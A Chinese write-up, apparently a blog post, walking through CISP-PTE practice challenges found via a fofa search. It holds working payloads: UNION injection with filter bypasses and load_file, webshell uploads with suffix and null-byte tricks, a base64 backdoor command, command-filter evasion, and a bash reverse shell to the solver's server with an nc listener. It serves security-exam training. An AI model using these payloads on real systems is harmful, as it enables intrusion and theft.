CSIP-PTE题目及通关
目录
前言
CSIP-PTE证书算是一个非常有含金量的证书,但是由于昂贵的考试费(考证加·培训2w)但是如果想要考csip的证书的话提前做做训练题很有必要的。
获取题目方式:打开fofa 输入 body="CISP-PTE"

有些网站打开就是一些CISP的题目 要有耐心 慢慢找

SQL注入

进入题目

题目已经提示了 包裹id的姿势为('%id%')
尝试一下

判断回显个数

回显个数为7

通过提示发现union被过滤了 双写绕过

题目说key在/tmp/key下
payload :id=-1%') UNunionION SELECT 1,load_file("/tmp/key"),3,4,5,6,7 --+

文件上传

一句话木马 后缀为jpg

上传然后抓包 这里使用的00截断 然后由于是post所以需要decode编码

查看flag

文件包含


通过url可以发现该页面包含的是view.html
尝试访问该文件

在源码中发现一个类似为php的后门文件

构造payload(x=1&z0=c3lzdGVtKCd0YWMgL3Zhci93d3cvaHRtbC9rZXkucGhwJyk7)

得到flag

也可以使用filer协议查看key文件

一发入魂 解码 得到key

命令执行

如cat、tac、less、more、tail这些,将tac中间加入一个\即可绕过 即可查看flag

暴力破解

由于这题可以看到验证码在判断完之后不会销毁,而是在页面刷新之后验证码才会刷新
所以可以直接输入正确的验证码然后爆破密码
最后得到正确的密码为123qwe

得到flag

sql注入

发现# --+都被过滤了

使用url编码# %23

空格也被绕过 使用/**/代替空格

联合查询 union也被过滤 双写绕过


得到flag

文件上传

一句话木马如下

修改php文件后缀为jpg 查看是否对该木马内容进行识别

那么该木马可以进行使用
尝试抓包 修改后缀

修改后缀为phP

查看flag

文件包含

未发现任何后门文件

使用fileter协议


得到flag

命令执行

使用tac命令查看key文件

得到flag

日志分析

下载日志

几乎从头看到尾 发现敏感目录

发现是一个登录框 尝试使用万能密码 无果只能爆破

得到账号为admin 密码为password123
登录得到flag

二阶sql注入

万能密码无果

注册一个新账户 这里我试过%23 无果 尝试使用# 注释


点击重置密码

尝试登录admin 登录上得到flag

文件上传

一句话木马


没有识别出文件内容

抓包

修改后缀为php 发现上传成功

查看flag

文件包含


这关filter协议无效 会在界面上输出一个error
但是这关有后门文件

解码

构造payload(Hello=1&z0=c3lzdGVtKCd0YWMgL3Zhci93d3cvaHRtbC9rZXkucGhwJyk7)
得到flag

代码审计

这串代码从上往下解读就是输出你所输入命令的长度,如果长度小于30就执行exec函数,如果大于30就执行highlight_file函数,最后在打印你的主机ip。
如果对这两个函数不懂的请点击这里exec&& highlight_file 。
这关你无论输入任何命令 界面都只会回显长度和用户的源ip,往里写一句话木马但是不知道路径,所以思路就是反弹shell。
很显然常规的python反弹 php反弹长度都过长 只能使用curl反弹。
打开一台服务器
进入/var/www/html
目录,将index.html
修改为以下内容
bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 #填写自己的服务器IP
随后开启apache
service apache2 restart
然后开启侦听
nc -lvvp 4444
随后在题目中进行传参

服务器端得到shell 查看flag

命令执行


经过测试发现管道符; | ||被过滤,tac,ls,cat,nore,less,tail等都被过滤了,单输入php也报敏感字符所以php也被过滤了,但是在php中加一个\就没有报敏感字符。

使用cat,less,more界面都回显good luck

当使用tac查看文件时则可以查看到flag

总结
这些题目对我来说难度还是有点的,大概花了两天时间,收获也挺多。对于一些大佬们来说估计这种题目都不够做的,像这种题目一般都是需要一些思路和经验,不会做也不要泄气,一步一个脚印才是真的。